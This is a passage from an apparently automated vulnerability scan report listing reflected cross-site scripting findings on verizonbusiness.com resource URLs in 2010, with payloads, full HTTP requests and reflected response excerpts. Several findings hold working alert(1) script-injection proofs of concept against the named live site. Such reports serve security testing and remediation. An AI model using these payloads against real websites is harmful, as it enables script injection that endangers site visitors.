var request='/resources/e67e3';cdf496f0cea'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.732. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaa6e</script><script>alert(1)</script>ae6da508b0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a4-111-Executive+Briefs.xmlaaa6e</script><script>alert(1)</script>ae6da508b0b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "c452e0394993e8113eafeb875c7fff64"
Last-Modified: Wed, 17 Nov 2010 00:30:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33497
Date: Wed, 17 Nov 2010 00:30:11 GMT
Connection: close
Set-Cookie: BERT=VRID%3db8cf5e7b-b8ba-4a83-bbe9-bd884dfd0ec1|VTID%3dc983dfc5-13b9-45a1-b16f-dd2f91d81cd1|SX%3d1289955011|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:55 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a4-111-Executive+Briefs.xmlaaa6e</script><script>alert(1)</script>ae6da508b0b</url>
...[SNIP]...

1.733. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34ded"%3be8d70d2e7ba was submitted in the REST URL parameter 1. This input was echoed as 34ded";e8d70d2e7ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources34ded"%3be8d70d2e7ba/1002a3a5-111-Fact+Sheets+&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:32 GMT
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources34ded";e8d70d2e7ba/1002a3a5-111-Fact+Sheets+&+Brochures.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.734. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8e11'%3bdc98a22fd76 was submitted in the REST URL parameter 1. This input was echoed as b8e11';dc98a22fd76 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb8e11'%3bdc98a22fd76/1002a3a5-111-Fact+Sheets+&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesb8e11';dc98a22fd76/1002a3a5-111-Fact+Sheets+&+Brochures.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.735. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7e89'%3bcd643907fdb was submitted in the REST URL parameter 2. This input was echoed as b7e89';cd643907fdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b7e89'%3bcd643907fdb&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:37 GMT
Content-Type: text/html
Content-Length: 40242
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b7e89';cd643907fdb&+Brochures.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.736. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc6b</script><script>alert(1)</script>a8779df6914 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a5-111-Fact+Sheets+2bc6b</script><script>alert(1)</script>a8779df6914&+Brochures.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Last-Modified: Wed, 17 Nov 2010 00:29:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:35 GMT
Connection: close
Connection: Transfer-Encoding
Expires: Mon, 16 Nov 2009 18:29:34 GMT
Content-Length: 104797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a3a5-111-Fact+Sheets+2bc6b</script><script>alert(1)</script>a8779df6914&+Brochures.xml</url>
...[SNIP]...

1.737. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4038d'%3b80661984162 was submitted in the REST URL parameter 1. This input was echoed as 4038d';80661984162 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4038d'%3b80661984162/1002a3a6-111-Podcasts.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:29:33 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources4038d';80661984162/1002a3a6-111-Podcasts.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.738. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 216e1"%3bc1b2f840f17 was submitted in the REST URL parameter 1. This input was echoed as 216e1";c1b2f840f17 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources216e1"%3bc1b2f840f17/1002a3a6-111-Podcasts.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:07 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources216e1";c1b2f840f17/1002a3a6-111-Podcasts.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.739. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15e06</script><script>alert(1)</script>653b9eba038 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a6-111-Podcasts.xml15e06</script><script>alert(1)</script>653b9eba038 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Last-Modified: Wed, 17 Nov 2010 00:30:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:31:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d896a3299-d8b6-4dfd-8ed4-6ac2ccd31b2d|VTID%3d33d6ced7-9731-437f-8f5a-b8fbe4148d2d|SX%3d1289955059|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:43 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:59 GMT
Content-Length: 247986

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a6-111-Podcasts.xml15e06</script><script>alert(1)</script>653b9eba038</url>
...[SNIP]...

1.740. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a6-111-Podcasts.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2111'%3b50715cbb080 was submitted in the REST URL parameter 2. This input was echoed as c2111';50715cbb080 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c2111'%3b50715cbb080 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:31:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:31:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/c2111';50715cbb080'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.741. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad609"%3bb9494151c4e was submitted in the REST URL parameter 1. This input was echoed as ad609";b9494151c4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesad609"%3bb9494151c4e/1002a3a7-111-Virtual+Tours+(Demos HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:41 GMT
Content-Type: text/html
Content-Length: 40666
Date: Wed, 17 Nov 2010 00:30:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesad609";b9494151c4e/1002a3a7-111-Virtual+Tours+(Demos";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.742. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14dfa'%3b457919f1d70 was submitted in the REST URL parameter 1. This input was echoed as 14dfa';457919f1d70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources14dfa'%3b457919f1d70/1002a3a7-111-Virtual+Tours+(Demos HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:01 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources14dfa';457919f1d70/1002a3a7-111-Virtual+Tours+(Demos'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.743. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb3d0</script><script>alert(1)</script>16990b32f17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a7-111-Virtual+Tours+(Demosbb3d0</script><script>alert(1)</script>16990b32f17 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "38eb5c7c7bc893ea759f98c994c55ad9"
Last-Modified: Wed, 17 Nov 2010 00:32:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dd8a33a40-5f6c-410d-aa10-0ac88beb3ec4|VTID%3d23fc11a3-ebde-49c2-9bfc-a606e9773847|SX%3d1289955126|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:35:50 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:32:06 GMT
Content-Length: 33730

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a3a7-111-Virtual+Tours+(Demosbb3d0</script><script>alert(1)</script>16990b32f17</url>
...[SNIP]...

1.744. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a7-111-Virtual+Tours+(Demos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f69fa'%3bd46aa6d4220 was submitted in the REST URL parameter 2. This input was echoed as f69fa';d46aa6d4220 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/f69fa'%3bd46aa6d4220 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:17 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
